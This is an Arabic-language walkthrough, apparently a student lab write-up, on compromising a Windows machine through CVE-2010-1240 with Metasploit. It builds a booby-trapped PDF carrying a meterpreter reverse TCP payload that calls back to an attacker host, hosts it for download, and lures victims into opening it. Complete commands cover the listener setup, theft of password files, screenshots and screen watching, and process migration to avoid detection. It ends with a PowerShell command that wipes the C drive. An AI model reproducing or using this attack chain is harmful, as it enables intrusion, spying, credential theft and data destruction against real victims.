
يوضح هذا الفيديو التوضيحي كيف يمكننا التحكم في جهاز الضحية عن طريق إرسال ملف PDF الذي يبدو بريئًا إلى الهدف، والذي يحتوي في الواقع على حمولة مدمجة. تم نشر الثغرة علنًا باسم CVE-2010-1240.
مقدَّم لكم من
يوضّح هذا الفيديو التوضيحي كيف يمكننا التحكم في جهاز الضحية عبر إرسال ملف PDF يبدو بريئًا إلى الهدف، بينما يحتوي في الواقع على حمولة مضمّنة. تم الكشف عن هذا الاستغلال علنًا باسم CVE-2010-1240.
بمجرد فتح ملف PDF في Adobe Reader، فإن المستخدمين الذين نخدعهم للموافقة على النوافذ المنبثقة الأمنية سيتيحون لنا الحصول على جلسة meterpreter مرتبطة بأجهزتهم عبر اتصال TCP عكسي. وعندها، تكون جميع بياناتهم وما يقومون به الآن تحت مراقبتنا.

أولاً، نقوم بتشغيل MSFconsole الذي يوفر لنا واجهة سطر أوامر للوصول إلى إطار عمل Metasploit.
msfconsole
بعد ذلك، نبحث عن استغلال يطابق منصة Windows المستهدفة وبرنامج Adobe PDF Reader، حيث سيعرض قائمة كاملة بالاستغلالات التي يمكن استخدامها لاختراق جهاز Windows الخاص بالضحية واستغلال ثغرات Adobe PDF Reader.
search type:exploit platform:windows adobe pdf
في هذا الاستغلال، نختار ونستخدم الوحدة "adobe_pdf_embedded_exe" بالأمر التالي لتحقيق هدف اختراق الضحية.
use exploit/windows/fileformat/adobe_pdf_embedded_exe
يمكننا أيضًا التحقق من معلومات الاستغلال باستخدام الأمر "info" كما هو موضح أدناه:
info
ثم نقوم بتعيين الحمولة لاستخدام اتصال TCP عكسي. كما نستخدم Meterpreter الذي يوفر غلافًا تفاعليًا يسهّل علينا استخدام جميع أنواع الوظائف عن طريق إدخال وتنفيذ الأكواد لاستكشاف جهاز الضحية.
set payload windows/meterpreter/reverse_tcp
بعد ذلك، سنقوم بتعيين المضيف والمنفذ المستمعين. بالنسبة إلى LHOST، نحتاج إلى إدخال عنوان IP الخاص بجهاز المهاجم، وهو في هذه الحالة عنوان IP الخاص بجهاز Kali الخاص بنا (10.0.2.4)*.
*p.s.
أما بالنسبة إلى LPORT، فلدينا حرية تعيين رقم منفذ غير شائع الاستخدام.
# to check Kali machine’s IP address
ifconfig
set LHOST *10.0.2.4*
set LPORT 5665
بعد ذلك، سنقوم بتعيين ملف الإدخال كأساس لملف PDF باستخدام علامة INFILENAME*. ثم سنقوم بتعيين اسم الملف إلى شيء يجذب اهتمام الضحية لفتح ملف PDF الخبيث.
*p.s.
set INFILENAME '/home/kali/Documents/WIC3004Assignment.pdf'
set FILENAME 'Bawang_Ranger_WIC3004Report.pdf'
يمكننا مراجعة الخيارات مرة أخرى قبل إدخال الأمر "exploit" لتوليد الحمولة مع ملف PDF.
# Then we can show the info or options by
show info | show options
exploit
بمجرد الانتهاء من توليد ملف PDF، سنقوم بنقل الملف إلى /var/www/html وهو دليل جهاز Kali الخاص بنا لاستضافة خادم تطبيق الويب ليتمكن الضحية من تنزيل ملف PDF لاحقًا.
Note:
sudo mv /home/kali/.msf4/local/Bawang_Ranger_WIC3004Report.pdf /var/www/html
بعد ذلك، لإعداد المستمع الخاص بنا، سنستخدم "exploit/multi/handler". مرة أخرى، سنقوم بتعيين الحمولة وLHOST وLPORT بما يتوافق مع ما حددناه عند توليد ملف PDF الخبيث. ثم سنقوم بتشغيل الحمولة.
Note:
show info أو show options أمر اختياري للتشغيل.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.2.4
set LPORT 5665
[show info | show options]
run
في طرفية أخرى، نتحقق من حالة خادم Apache للتأكد من أنه يعمل لاستضافة ملف PDF الخاص بنا في /var/www/html ليتمكن الضحية من تنزيل الملف.
service apache2 status
# If it is inactive, start the service
service apache2 start
على جهاز Windows، افتح أي متصفح مثل Chrome واكتب عنوان IP الخاص بـ Kali (10.0.2.4)* للوصول إلى خادم تطبيق الويب الخاص بجهاز Kali.
*Note: يرجى الانتباه إلى عنوان IP الخاص بجهاز Kali الخاص بك
بعد ذلك، قم بمحاكاة قيام مستخدم بحفظ ملف PDF المقصود.
بمجرد فتح الضحية للملف في Adobe Reader 8.1.2 والموافقة على رسائل الأمان المنبثقة، يمكننا عندئذٍ ملاحظة وجود جلسة جديدة متصلة عبر اتصال TCP عكسي على جهاز Kali الخاص بنا.
في السيناريو الواقعي، سنقوم بإعداد موقع ويب يحوي ملف PDF ذا الحمولة المضمّنة ليتيح للضحية تنزيل الملف أو إرفاقه عبر البريد الإلكتروني.
بعد ذلك، يمكننا الوصول عن بُعد إلى جهاز الضحية ثم تنفيذ المزيد من السلوكيات الخبيثة التي نريدها في جلسة meterpreter.
help
pwd
ls
على سبيل المثال، إذا كان هناك ملف باسم password.txt، يمكننا إصدار الأمر download password.txt
download [folder name | filename with extension]
بالطبع، يمكننا كتابة سكربت خبيث (زرع باب خلفي) لإبقاء اتصالنا بجهاز Windows إذا كنا أشرارًا حقًا! 💀
# Boot command prompt at background
execute -f cmd.exe -H -i
# Create file on Windows
echo "You have been hacked" > hack.txt
#open the txt file we have just created
hack.txt
# Take screenshot
screenshot
# Watch the remote user in real time
screenshare
ومع ذلك، يمكن للمهاجم تقليل الشكوك عن طريق ترحيل عملية meterpreter إلى عملية مختلفة باستخدام وحدة migrate في جلسة meterpreter.
meterpreter> run post/windows/manage/migrate
هنا، سيقوم تلقائيًا بإنشاء عملية جديدة في جهاز الضحية ليرحّل نفسه إليها. وعندها يمكن للضحية حذف ملف PDF المصاب، دون أن يدرك تمامًا أن العملية انتقلت بالفعل إلى مكان آخر.
يمكن للمهاجم أيضًا إنشاء سكربت خبيث على الجهاز المستهدف باستخدام موجه الأوامر (cmd) أو PowerShell، وهو قادر على تعطيل نظام التشغيل بالكامل ومنعه من العمل بشكل صحيح.
meterpreter> shell
# Start the Windows PowerShell
powershell
#Powershell command to forcefully format the C drive clean.
New-Partition -DiskNumber 1 -UseMaximumSize -AssignDriveLetter C| Format-Volume -DriveLetter C -FileSystemLabel "New"-FileSystem NTFS -Full -Force -Confirm:$false